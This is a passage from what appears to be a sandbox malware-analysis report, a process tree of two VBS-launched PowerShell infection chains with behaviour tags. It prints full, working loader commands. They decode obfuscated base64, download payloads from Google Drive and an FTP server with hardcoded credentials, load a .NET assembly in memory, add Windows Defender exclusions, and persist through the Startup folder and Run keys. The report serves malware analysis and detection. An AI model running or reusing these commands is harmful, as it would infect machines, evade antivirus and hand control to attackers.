CQAKAAgAGYAaQA7ACAAKQAnADQANgAnACgAcwBuAGkAYQB0AG4AbwBDAC4ARQBSAFUAVABDAEUAVABJAEgAQwBSAEEAXwBSAE8AUwBTAEUAQwBPAFIAUAA6AHYAbgBlACQAIAA9ACAAbwBHAGYARABRACQAOwAnAD0AZABpACYAZABhAG8AbABuAHcAbwBkAD0AdAByAG8AcAB4AGUAPwBjAHUALwBtAG8AYwAuAGUAbABnAG8AbwBnAC4AZQB2AGkAcgBkAC8ALwA6AHMAcAB0AHQAaAAnACAAPQAgAFAAcABWAGkAcwAkADsAKQAnAHUAcwBtAC4AbgBpAHcAcABVAFwAJwAgACsAIABhAHQAcwBhAHAAJAAoACAAbABlAGQAOwApACgAaAB0AGEAUABwAG0AZQBUAHQAZQBHADoAOgBdAGgAdABhAFAALgBPAEkALgBtAGUAdABzAHkAUwBbACAAPQAgAGEAdABzAGEAcAAkAHsAIAApAEgAQgBaAGoARgAkACgAIABmAGkAOwAgACkAMgAoAHMAbABhAHUAcQBFAC4AcgBvAGoAYQBNAC4AbgBvAGkAcwByAGUAVgAuAHQAcwBvAGgAJAAgAD0AIABIAEIAWgBqAEYAJAAgADsA';$RIyag = $qCybe.replace('ШḆЉ' , 'A') ;$gsoKZ = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String( $RIyag ) ); $gsoKZ = $gsoKZ[-1..-$gsoKZ.Length] -join '';$gsoKZ = $gsoKZ.replace('%XRqhI%','C:\Users\Admin\AppData\Roaming\DriftCar.vbs');powershell $gsoKZ
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2528
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $FjZBH = $host.Version.Major.Equals(2) ;if ($FjZBH) {$pasta = [System.IO.Path]::GetTempPath();del ($pasta + '\Upwin.msu');$siVpP = 'https://drive.google.com/uc?export=download&id=';$QDfGo = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ($QDfGo) {$siVpP = ($siVpP + '112AdPfI0PC7hbsci_5_0_eU7NwMZhf4x') ;}else {$siVpP = ($siVpP + '1brj5jqnqRxCD6VhfhAn2rcVfsRo7D8gr') ;};$uHUso = (New-Object Net.WebClient);$uHUso.Encoding = [System.Text.Encoding]::UTF8;$uHUso.DownloadFile($URLKB, $pasta + '\Upwin.msu');$FoldStartup = ('C:\Users\' + [Environment]::UserName );$file = ($pasta + '\Upwin.msu'); powershell.exe wusa.exe $file /quiet /norestart ; Copy-Item 'C:\Users\Admin\AppData\Roaming\DriftCar.vbs' -Destination ( $FoldStartup + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$GAwZn;$lqVmC = (New-Object Net.WebClient);$lqVmC.Encoding = [System.Text.Encoding]::UTF8;$lqVmC.Credentials = new-object System.Net.NetworkCredential('desckvbrat1','developerpro21578Jp@@');$GAwZn = $lqVmC.DownloadString( 'ftp://[email protected]/Upcrypter/01/DLL01.txt' );$lqVmC.dispose();$lqVmC = (New-Object Net.WebClient);$lqVmC.Encoding = [System.Text.Encoding]::UTF8;$GAwZn = $lqVmC.DownloadString( $GAwZn );$hzwje = 'C:\Users\Admin\AppData\Roaming\DriftCar.vbs';[Byte[]] $xXzmx = [System.Convert]::FromBase64String( $GAwZn.Replace( '↓:↓' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $xXzmx ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( '0/eEKUN/r/ee.etsap//:sptth' , $hzwje , 'true' ) );};"
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:364
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell $S = 'C:\Windows\SysWOW64\WindowsPowerShell\v1.0' ; Add-MpPreference -ExclusionPath $S -force ;
        5⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:4784
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell $S = 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe' ; Add-MpPreference -ExclusionPath $S -force ;
        5⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:4868
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c mkdir "C:\Users\Admin\AppData\Local\Microsoft\LocalLow\System Update\"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1168
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\Local\Microsoft\LocalLow\System Update\\x2.ps1"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Adds Run key to start application
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:4992
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Microsoft\LocalLow\System Update\ausun.ps1"
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:5068
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:2300
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c del "C:\Users\Admin\AppData\Roaming\DriftCar.vbs"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2456
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Xtrem.vbs"
  2⤵
  - Checks computer location settings
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:4620
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$qCybe = 'OwB9ШḆЉDsШḆЉKQШḆЉgШḆЉCkШḆЉIШḆЉШḆЉnШḆЉGUШḆЉdQByШḆЉHQШḆЉJwШḆЉgШḆЉCwШḆЉIШḆЉBlШḆЉGoШḆЉdwB6ШḆЉGgШḆЉJШḆЉШḆЉgШḆЉCwШḆЉIШḆЉШḆЉnШḆЉGgШḆЉdШḆЉB0ШḆЉHШḆЉШḆЉcwШḆЉ6ШḆЉC8ШḆЉLwBwШḆЉGEШḆЉcwB0ШḆЉGUШḆЉLgBlШḆЉGUШḆЉLwByШḆЉC8ШḆЉWgBPШḆЉHШḆЉШḆЉawB4ШḆЉC8ШḆЉMШḆЉШḆЉnШḆЉCШḆЉШḆЉKШḆЉШḆЉgШḆЉF0ШḆЉXQBbШḆЉHQШḆЉYwBlШḆЉGoШḆЉYgBvШḆЉFsШḆЉIШḆЉШḆЉsШḆЉCШḆЉШḆЉbШḆЉBsШḆЉHUШḆЉbgШḆЉkШḆЉCШḆЉШḆЉKШḆЉBlШḆЉGsШḆЉbwB2ШḆЉG4ШḆЉSQШḆЉuШḆЉCkШḆЉIШḆЉШḆЉnШḆЉEkШḆЉVgBGШḆЉHIШḆЉcШḆЉШḆЉnШḆЉCШḆЉШḆЉKШḆЉBkШḆЉG8ШḆЉaШḆЉB0ШḆЉGUШḆЉTQB0ШḆЉGUШḆЉRwШḆЉuШḆЉCkШḆЉJwШḆЉxШḆЉHMШḆЉcwBhШḆЉGwШḆЉQwШḆЉuШḆЉDMШḆЉeQByШḆЉGEШḆЉcgBiШḆЉGkШḆЉTШḆЉBzШḆЉHMШḆЉYQBsШḆЉEMШḆЉJwШḆЉoШḆЉGUШḆЉcШḆЉB5ШḆЉFQШḆЉdШḆЉBlШḆЉEcШḆЉLgШḆЉpШḆЉCШḆЉШḆЉeШḆЉBtШḆЉHoШḆЉWШḆЉB4ШḆЉCQШḆЉIШḆЉШḆЉoШḆЉGQШḆЉYQBvШḆЉEwШḆЉLgBuШḆЉGkШḆЉYQBtШḆЉG8ШḆЉRШḆЉB0ШḆЉG4ШḆЉZQByШḆЉHIШḆЉdQBDШḆЉDoШḆЉOgBdШḆЉG4ШḆЉaQBhШḆЉG0ШḆЉbwBEШḆЉHШḆЉШḆЉcШḆЉBBШḆЉC4ШḆЉbQBlШḆЉHQШḆЉcwB5ШḆЉFMШḆЉWwШḆЉ7ШḆЉCkШḆЉIШḆЉШḆЉpШḆЉCШḆЉШḆЉJwBBШḆЉCcШḆЉIШḆЉШḆЉsШḆЉCШḆЉШḆЉJwCTIToШḆЉkyEnШḆЉCШḆЉШḆЉKШḆЉBlШḆЉGMШḆЉYQBsШḆЉHШḆЉШḆЉZQBSШḆЉC4ШḆЉbgBaШḆЉHcШḆЉQQBHШḆЉCQШḆЉIШḆЉШḆЉoШḆЉGcШḆЉbgBpШḆЉHIШḆЉdШḆЉBTШḆЉDQШḆЉNgBlШḆЉHMШḆЉYQBCШḆЉG0ШḆЉbwByШḆЉEYШḆЉOgШḆЉ6ШḆЉF0ШḆЉdШḆЉByШḆЉGUШḆЉdgBuШḆЉG8ШḆЉQwШḆЉuШḆЉG0ШḆЉZQB0ШḆЉHMШḆЉeQBTШḆЉFsШḆЉIШḆЉШḆЉ9ШḆЉCШḆЉШḆЉeШḆЉBtШḆЉHoШḆЉWШḆЉB4ШḆЉCQШḆЉIШḆЉBdШḆЉF0ШḆЉWwBlШḆЉHQШḆЉeQBCШḆЉFsШḆЉOwШḆЉnШḆЉCUШḆЉSQBoШḆЉHEШḆЉUgBYШḆЉCUШḆЉJwШḆЉgШḆЉD0ШḆЉIШḆЉBlШḆЉGoШḆЉdwB6ШḆЉGgШḆЉJШḆЉШḆЉ7ШḆЉCkШḆЉIШḆЉBuШḆЉFoШḆЉdwBBШḆЉEcШḆЉJШḆЉШḆЉgШḆЉCgШḆЉZwBuШḆЉGkШḆЉcgB0ШḆЉFMШḆЉZШḆЉBhШḆЉG8ШḆЉbШḆЉBuШḆЉHcШḆЉbwBEШḆЉC4ШḆЉQwBtШḆЉFYШḆЉcQBsШḆЉCQШḆЉIШḆЉШḆЉ9ШḆЉCШḆЉШḆЉbgBaШḆЉHcШḆЉQQBHШḆЉCQШḆЉOwШḆЉ4ШḆЉEYШḆЉVШḆЉBVШḆЉDoШḆЉOgBdШḆЉGcШḆЉbgBpШḆЉGQШḆЉbwBjШḆЉG4ШḆЉRQШḆЉuШḆЉHQШḆЉeШḆЉBlШḆЉFQШḆЉLgBtШḆЉGUШḆЉdШḆЉBzШḆЉHkШḆЉUwBbШḆЉCШḆЉШḆЉPQШḆЉgШḆЉGcШḆЉbgBpШḆЉGQШḆЉbwBjШḆЉG4ШḆЉRQШḆЉuШḆЉEMШḆЉbQBWШḆЉHEШḆЉbШḆЉШḆЉkШḆЉDsШḆЉKQB0ШḆЉG4ШḆЉZQBpШḆЉGwШḆЉQwBiШḆЉGUШḆЉVwШḆЉuШḆЉHQШḆЉZQBOШḆЉCШḆЉШḆЉdШḆЉBjШḆЉGUШḆЉagBiШḆЉE8ШḆЉLQB3ШḆЉGUШḆЉTgШḆЉoШḆЉCШḆЉШḆЉPQШḆЉgШḆЉEMШḆЉbQBWШḆЉHEШḆЉbШḆЉШḆЉkШḆЉDsШḆЉKQШḆЉoШḆЉGUШḆЉcwBvШḆЉHШḆЉШḆЉcwBpШḆЉGQШḆЉLgBDШḆЉG0ШḆЉVgBxШḆЉGwШḆЉJШḆЉШḆЉ7ШḆЉCkШḆЉIШḆЉШḆЉnШḆЉHQШḆЉeШḆЉB0ШḆЉC4ШḆЉMQШḆЉwШḆЉEwШḆЉTШḆЉBEШḆЉC8ШḆЉMQШḆЉwШḆЉC8ШḆЉcgBlШḆЉHQШḆЉcШḆЉB5ШḆЉHIШḆЉYwBwШḆЉFUШḆЉLwByШḆЉGIШḆЉLgBtШḆЉG8ШḆЉYwШḆЉuШḆЉHQШḆЉYQByШḆЉGIШḆЉdgBrШḆЉGMШḆЉcwBlШḆЉGQШḆЉLgBwШḆЉHQШḆЉZgBШḆЉШḆЉDEШḆЉdШḆЉBhШḆЉHIШḆЉYgB2ШḆЉGsШḆЉYwBzШḆЉGUШḆЉZШḆЉШḆЉvШḆЉC8ШḆЉOgBwШḆЉHQШḆЉZgШḆЉnШḆЉCШḆЉШḆЉKШḆЉBnШḆЉG4ШḆЉaQByШḆЉHQШḆЉUwBkШḆЉGEШḆЉbwBsШḆЉG4ШḆЉdwBvШḆЉEQШḆЉLgBDШḆЉG0ШḆЉVgBxШḆЉGwШḆЉJШḆЉШḆЉgШḆЉD0ШḆЉIШḆЉBuШḆЉFoШḆЉdwBBШḆЉEcШḆЉJШḆЉШḆЉ7ШḆЉCkШḆЉJwBШḆЉШḆЉEШḆЉШḆЉcШḆЉBKШḆЉDgШḆЉNwШḆЉ1ШḆЉDEШḆЉMgBvШḆЉHIШḆЉcШḆЉByШḆЉGUШḆЉcШḆЉBvШḆЉGwШḆЉZQB2ШḆЉGUШḆЉZШḆЉШḆЉnШḆЉCwШḆЉJwШḆЉxШḆЉHQШḆЉYQByШḆЉGIШḆЉdgBrШḆЉGMШḆЉcwBlШḆЉGQШḆЉJwШḆЉoШḆЉGwШḆЉYQBpШḆЉHQШḆЉbgBlШḆЉGQШḆЉZQByШḆЉEMШḆЉawByШḆЉG8ШḆЉdwB0ШḆЉGUШḆЉTgШḆЉuШḆЉHQШḆЉZQBOШḆЉC4ШḆЉbQBlШḆЉHQШḆЉcwB5ШḆЉFMШḆЉIШḆЉB0ШḆЉGMШḆЉZQBqШḆЉGIШḆЉbwШḆЉtШḆЉHcШḆЉZQBuШḆЉCШḆЉШḆЉPQШḆЉgШḆЉHMШḆЉbШḆЉBhШḆЉGkШḆЉdШḆЉBuШḆЉGUШḆЉZШḆЉBlШḆЉHIШḆЉQwШḆЉuШḆЉEMШḆЉbQBWШḆЉHEШḆЉbШḆЉШḆЉkШḆЉDsШḆЉOШḆЉBGШḆЉFQШḆЉVQШḆЉ6ШḆЉDoШḆЉXQBnШḆЉG4ШḆЉaQBkШḆЉG8ШḆЉYwBuШḆЉEUШḆЉLgB0ШḆЉHgШḆЉZQBUШḆЉC4ШḆЉbQBlШḆЉHQШḆЉcwB5ШḆЉFMШḆЉWwШḆЉgШḆЉD0ШḆЉIШḆЉBnШḆЉG4ШḆЉaQBkШḆЉG8ШḆЉYwBuШḆЉEUШḆЉLgBDШḆЉG0ШḆЉVgBxШḆЉGwШḆЉJШḆЉШḆЉ7ШḆЉCkШḆЉdШḆЉBuШḆЉGUШḆЉaQBsШḆЉEMШḆЉYgBlШḆЉFcШḆЉLgB0ШḆЉGUШḆЉTgШḆЉgШḆЉHQШḆЉYwBlШḆЉGoШḆЉYgBPШḆЉC0ШḆЉdwBlШḆЉE4ШḆЉKШḆЉШḆЉgШḆЉD0ШḆЉIШḆЉBDШḆЉG0ШḆЉVgBxШḆЉGwШḆЉJШḆЉШḆЉ7ШḆЉG4ШḆЉWgB3ШḆЉEEШḆЉRwШḆЉkШḆЉDsШḆЉMgШḆЉxШḆЉHMШḆЉbШḆЉBUШḆЉDoШḆЉOgBdШḆЉGUШḆЉcШḆЉB5ШḆЉFQШḆЉbШḆЉBvШḆЉGMШḆЉbwB0ШḆЉG8ШḆЉcgBQШḆЉHkШḆЉdШḆЉBpШḆЉHIШḆЉdQBjШḆЉGUШḆЉUwШḆЉuШḆЉHQШḆЉZQBOШḆЉC4ШḆЉbQBlШḆЉHQШḆЉcwB5ШḆЉFMШḆЉWwШḆЉgШḆЉD0ШḆЉIШḆЉBsШḆЉG8ШḆЉYwBvШḆЉHQШḆЉbwByШḆЉFШḆЉШḆЉeQB0ШḆЉGkШḆЉcgB1ШḆЉGMШḆЉZQBTШḆЉDoШḆЉOgBdШḆЉHIШḆЉZQBnШḆЉGEШḆЉbgBhШḆЉE0ШḆЉdШḆЉBuШḆЉGkШḆЉbwBQШḆЉGUШḆЉYwBpШḆЉHYШḆЉcgBlШḆЉFMШḆЉLgB0ШḆЉGUШḆЉTgШḆЉuШḆЉG0ШḆЉZQB0ШḆЉHMШḆЉeQBTШḆЉFsШḆЉOwB9ШḆЉGUШḆЉdQByШḆЉHQШḆЉJШḆЉB7ШḆЉCШḆЉШḆЉPQШḆЉgШḆЉGsШḆЉYwBhШḆЉGIШḆЉbШḆЉBsШḆЉGEШḆЉQwBuШḆЉG8ШḆЉaQB0ШḆЉGEШḆЉZШḆЉBpШḆЉGwШḆЉYQBWШḆЉGUШḆЉdШḆЉBhШḆЉGMШḆЉaQBmШḆЉGkШḆЉdШḆЉByШḆЉGUШḆЉQwByШḆЉGUШḆЉdgByШḆЉGUШḆЉUwШḆЉ6ШḆЉDoШḆЉXQByШḆЉGUШḆЉZwBhШḆЉG4ШḆЉYQBNШḆЉHQШḆЉbgBpШḆЉG8ШḆЉUШḆЉBlШḆЉGMШḆЉaQB2ШḆЉHIШḆЉZQBTШḆЉC4ШḆЉdШḆЉBlШḆЉE4ШḆЉLgBtШḆЉGUШḆЉdШḆЉBzШḆЉHkШḆЉUwBbШḆЉHsШḆЉIШḆЉBlШḆЉHMШḆЉbШḆЉBlШḆЉH0ШḆЉIШḆЉBmШḆЉC8ШḆЉIШḆЉШḆЉwШḆЉCШḆЉШḆЉdШḆЉШḆЉvШḆЉCШḆЉШḆЉcgШḆЉvШḆЉCШḆЉШḆЉZQB4ШḆЉGUШḆЉLgBuШḆЉHcШḆЉbwBkШḆЉHQШḆЉdQBoШḆЉHMШḆЉIШḆЉШḆЉ7ШḆЉCcШḆЉMШḆЉШḆЉ4ШḆЉDEШḆЉIШḆЉBwШḆЉGUШḆЉZQBsШḆЉHMШḆЉJwШḆЉgШḆЉGQШḆЉbgBhШḆЉG0ШḆЉbQBvШḆЉGMШḆЉLQШḆЉgШḆЉGUШḆЉeШḆЉBlШḆЉC4ШḆЉbШḆЉBsШḆЉGUШḆЉaШḆЉBzШḆЉHIШḆЉZQB3ШḆЉG8ШḆЉcШḆЉШḆЉ7ШḆЉCШḆЉШḆЉZQBjШḆЉHIШḆЉbwBmШḆЉC0ШḆЉIШḆЉШḆЉpШḆЉCШḆЉШḆЉJwBwШḆЉHUШḆЉdШḆЉByШḆЉGEШḆЉdШḆЉBTШḆЉFwШḆЉcwBtШḆЉGEШḆЉcgBnШḆЉG8ШḆЉcgBQШḆЉFwШḆЉdQBuШḆЉGUШḆЉTQШḆЉgШḆЉHQШḆЉcgBhШḆЉHQШḆЉUwBcШḆЉHMШḆЉdwBvШḆЉGQШḆЉbgBpШḆЉFcШḆЉXШḆЉB0ШḆЉGYШḆЉbwBzШḆЉG8ШḆЉcgBjШḆЉGkШḆЉTQBcШḆЉGcШḆЉbgBpШḆЉG0ШḆЉYQBvШḆЉFIШḆЉXШḆЉBhШḆЉHQШḆЉYQBEШḆЉHШḆЉШḆЉcШḆЉBBШḆЉFwШḆЉJwШḆЉgШḆЉCsШḆЉIШḆЉBwШḆЉHUШḆЉdШḆЉByШḆЉGEШḆЉdШḆЉBTШḆЉGQШḆЉbШḆЉBvШḆЉEYШḆЉJШḆЉШḆЉgШḆЉCgШḆЉIШḆЉBuШḆЉG8ШḆЉaQB0ШḆЉGEШḆЉbgBpШḆЉHQШḆЉcwBlШḆЉEQШḆЉLQШḆЉgШḆЉCcШḆЉJQBJШḆЉGgШḆЉcQBSШḆЉFgШḆЉJQШḆЉnШḆЉCШḆЉШḆЉbQBlШḆЉHQШḆЉSQШḆЉtШḆЉHkШḆЉcШḆЉBvШḆЉEMШḆЉIШḆЉШḆЉ7ШḆЉCШḆЉШḆЉdШḆЉByШḆЉGEШḆЉdШḆЉBzШḆЉGUШḆЉcgBvШḆЉG4ШḆЉLwШḆЉgШḆЉHQШḆЉZQBpШḆЉHUШḆЉcQШḆЉvШḆЉCШḆЉШḆЉZQBsШḆЉGkШḆЉZgШḆЉkШḆЉCШḆЉШḆЉZQB4ШḆЉGUШḆЉLgBhШḆЉHMШḆЉdQB3ШḆЉCШḆЉШḆЉZQB4ШḆЉGUШḆЉLgBsШḆЉGwШḆЉZQBoШḆЉHMШḆЉcgBlШḆЉHcШḆЉbwBwШḆЉCШḆЉШḆЉOwШḆЉpШḆЉCcШḆЉdQBzШḆЉG0ШḆЉLgBuШḆЉGkШḆЉdwBwШḆЉFUШḆЉXШḆЉШḆЉnШḆЉCШḆЉШḆЉKwШḆЉgШḆЉGEШḆЉdШḆЉBzШḆЉGEШḆЉcШḆЉШḆЉkШḆЉCgШḆЉIШḆЉШḆЉ9ШḆЉCШḆЉШḆЉZQBsШḆЉGkШḆЉZgШḆЉkШḆЉDsШḆЉKQШḆЉgШḆЉGUШḆЉbQBhШḆЉE4ШḆЉcgBlШḆЉHMШḆЉVQШḆЉ6ШḆЉDoШḆЉXQB0ШḆЉG4ШḆЉZQBtШḆЉG4ШḆЉbwByШḆЉGkШḆЉdgBuШḆЉEUШḆЉWwШḆЉgШḆЉCsШḆЉIШḆЉШḆЉnШḆЉFwШḆЉcwByШḆЉGUШḆЉcwBVШḆЉFwШḆЉOgBDШḆЉCcШḆЉKШḆЉШḆЉgШḆЉD0ШḆЉIШḆЉBwШḆЉHUШḆЉdШḆЉByШḆЉGEШḆЉdШḆЉBTШḆЉGQШḆЉbШḆЉBvШḆЉEYШḆЉJШḆЉШḆЉ7ШḆЉCkШḆЉJwB1ШḆЉHMШḆЉbQШḆЉuШḆЉG4ШḆЉaQB3ШḆЉHШḆЉШḆЉVQBcШḆЉCcШḆЉIШḆЉШḆЉrШḆЉCШḆЉШḆЉYQB0ШḆЉHMШḆЉYQBwШḆЉCQШḆЉIШḆЉШḆЉsШḆЉEIШḆЉSwBMШḆЉFIШḆЉVQШḆЉkШḆЉCgШḆЉZQBsШḆЉGkШḆЉRgBkШḆЉGEШḆЉbwBsШḆЉG4ШḆЉdwBvШḆЉEQШḆЉLgBvШḆЉHMШḆЉVQBIШḆЉHUШḆЉJШḆЉШḆЉ7ШḆЉDgШḆЉRgBUШḆЉFUШḆЉOgШḆЉ6ШḆЉF0ШḆЉZwBuШḆЉGkШḆЉZШḆЉBvШḆЉGMШḆЉbgBFШḆЉC4ШḆЉdШḆЉB4ШḆЉGUШḆЉVШḆЉШḆЉuШḆЉG0ШḆЉZQB0ШḆЉHMШḆЉeQBTШḆЉFsШḆЉIШḆЉШḆЉ9ШḆЉCШḆЉШḆЉZwBuШḆЉGkШḆЉZШḆЉBvШḆЉGMШḆЉbgBFШḆЉC4ШḆЉbwBzШḆЉFUШḆЉSШḆЉB1ШḆЉCQШḆЉOwШḆЉpШḆЉHQШḆЉbgBlШḆЉGkШḆЉbШḆЉBDШḆЉGIШḆЉZQBXШḆЉC4ШḆЉdШḆЉBlШḆЉE4ШḆЉIШḆЉB0ШḆЉGMШḆЉZQBqШḆЉGIШḆЉTwШḆЉtШḆЉHcШḆЉZQBOШḆЉCgШḆЉIШḆЉШḆЉ9ШḆЉCШḆЉШḆЉbwBzШḆЉFUШḆЉSШḆЉB1ШḆЉCQШḆЉOwB9ШḆЉDsШḆЉIШḆЉШḆЉpШḆЉCcШḆЉcgBnШḆЉDgШḆЉRШḆЉШḆЉ3ШḆЉG8ШḆЉUgBzШḆЉGYШḆЉVgBjШḆЉHIШḆЉMgBuШḆЉEEШḆЉaШḆЉBmШḆЉGgШḆЉVgШḆЉ2ШḆЉEQШḆЉQwB4ШḆЉFIШḆЉcQBuШḆЉHEШḆЉagШḆЉ1ШḆЉGoШḆЉcgBiШḆЉDEШḆЉJwШḆЉgШḆЉCsШḆЉIШḆЉBQШḆЉHШḆЉШḆЉVgBpШḆЉHMШḆЉJШḆЉШḆЉoШḆЉCШḆЉШḆЉPQШḆЉgШḆЉFШḆЉШḆЉcШḆЉBWШḆЉGkШḆЉcwШḆЉkШḆЉHsШḆЉIШḆЉBlШḆЉHMШḆЉbШḆЉBlШḆЉH0ШḆЉOwШḆЉgШḆЉCkШḆЉJwB4ШḆЉDQШḆЉZgBoШḆЉFoШḆЉTQB3ШḆЉE4ШḆЉNwBVШḆЉGUШḆЉXwШḆЉwШḆЉF8ШḆЉNQBfШḆЉGkШḆЉYwBzШḆЉGIШḆЉaШḆЉШḆЉ3ШḆЉEMШḆЉUШḆЉШḆЉwШḆЉEkШḆЉZgBQШḆЉGQШḆЉQQШḆЉyШḆЉDEШḆЉMQШḆЉnШḆЉCШḆЉШḆЉKwШḆЉgШḆЉFШḆЉШḆЉcABWAGkAcwAkACgAIAA9ACAAUABwAFYAaQBzACQAewAgACkAbwBHAGYARABRACQAKAAgAGYAaQA7ACAAKQAnADQANgAnACgAcwBuAGkAYQB0AG4AbwBDAC4ARQBSAFUAVABDAEUAVABJAEgAQwBSAEEAXwBSAE8AUwBTAEUAQwBPAFIAUAA6AHYAbgBlACQAIAA9ACAAbwBHAGYARABRACQAOwAnAD0AZABpACYAZABhAG8AbABuAHcAbwBkAD0AdAByAG8AcAB4AGUAPwBjAHUALwBtAG8AYwAuAGUAbABnAG8AbwBnAC4AZQB2AGkAcgBkAC8ALwA6AHMAcAB0AHQAaAAnACAAPQAgAFAAcABWAGkAcwAkADsAKQAnAHUAcwBtAC4AbgBpAHcAcABVAFwAJwAgACsAIABhAHQAcwBhAHAAJAAoACAAbABlAGQAOwApACgAaAB0AGEAUABwAG0AZQBUAHQAZQBHADoAOgBdAGgAdABhAFAALgBPAEkALgBtAGUAdABzAHkAUwBbACAAPQAgAGEAdABzAGEAcAAkAHsAIAApAEgAQgBaAGoARgAkACgAIABmAGkAOwAgACkAMgAoAHMAbABhAHUAcQBFAC4AcgBvAGoAYQBNAC4AbgBvAGkAcwByAGUAVgAuAHQAcwBvAGgAJAAgAD0AIABIAEIAWgBqAEYAJAAgADsA';$RIyag = $qCybe.replace('ШḆЉ' , 'A') ;$gsoKZ = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String( $RIyag ) ); $gsoKZ = $gsoKZ[-1..-$gsoKZ.Length] -join '';$gsoKZ = $gsoKZ.replace('%XRqhI%','C:\Users\Admin\AppData\Roaming\Xtrem.vbs');powershell $gsoKZ
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1520
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $FjZBH = $host.Version.Major.Equals(2) ;if ($FjZBH) {$pasta = [System.IO.Path]::GetTempPath();del ($pasta + '\Upwin.msu');$siVpP = 'https://drive.google.com/uc?export=download&id=';$QDfGo = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ($QDfGo) {$siVpP = ($siVpP + '112AdPfI0PC7hbsci_5_0_eU7NwMZhf4x') ;}else {$siVpP = ($siVpP + '1brj5jqnqRxCD6VhfhAn2rcVfsRo7D8gr') ;};$uHUso = (New-Object Net.WebClient);$uHUso.Encoding = [System.Text.Encoding]::UTF8;$uHUso.DownloadFile($URLKB, $pasta + '\Upwin.msu');$FoldStartup = ('C:\Users\' + [Environment]::UserName );$file = ($pasta + '\Upwin.msu'); powershell.exe wusa.exe $file /quiet /norestart ; Copy-Item 'C:\Users\Admin\AppData\Roaming\Xtrem.vbs' -Destination ( $FoldStartup + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$GAwZn;$lqVmC = (New-Object Net.WebClient);$lqVmC.Encoding = [System.Text.Encoding]::UTF8;$lqVmC.Credentials = new-object System.Net.NetworkCredential('desckvbrat1','developerpro21578Jp@@');$GAwZn = $lqVmC.DownloadString( 'ftp://[email protected]/Upcrypter/01/DLL01.txt' );$lqVmC.dispose();$lqVmC = (New-Object Net.WebClient);$lqVmC.Encoding = [System.Text.Encoding]::UTF8;$GAwZn = $lqVmC.DownloadString( $GAwZn );$hzwje = 'C:\Users\Admin\AppData\Roaming\Xtrem.vbs';[Byte[]] $xXzmx = [System.Convert]::FromBase64String( $GAwZn.Replace( '↓:↓' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $xXzmx ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( '0/xkpOZ/r/ee.etsap//:sptth' , $hzwje , 'true' ) );};"
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:1452
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
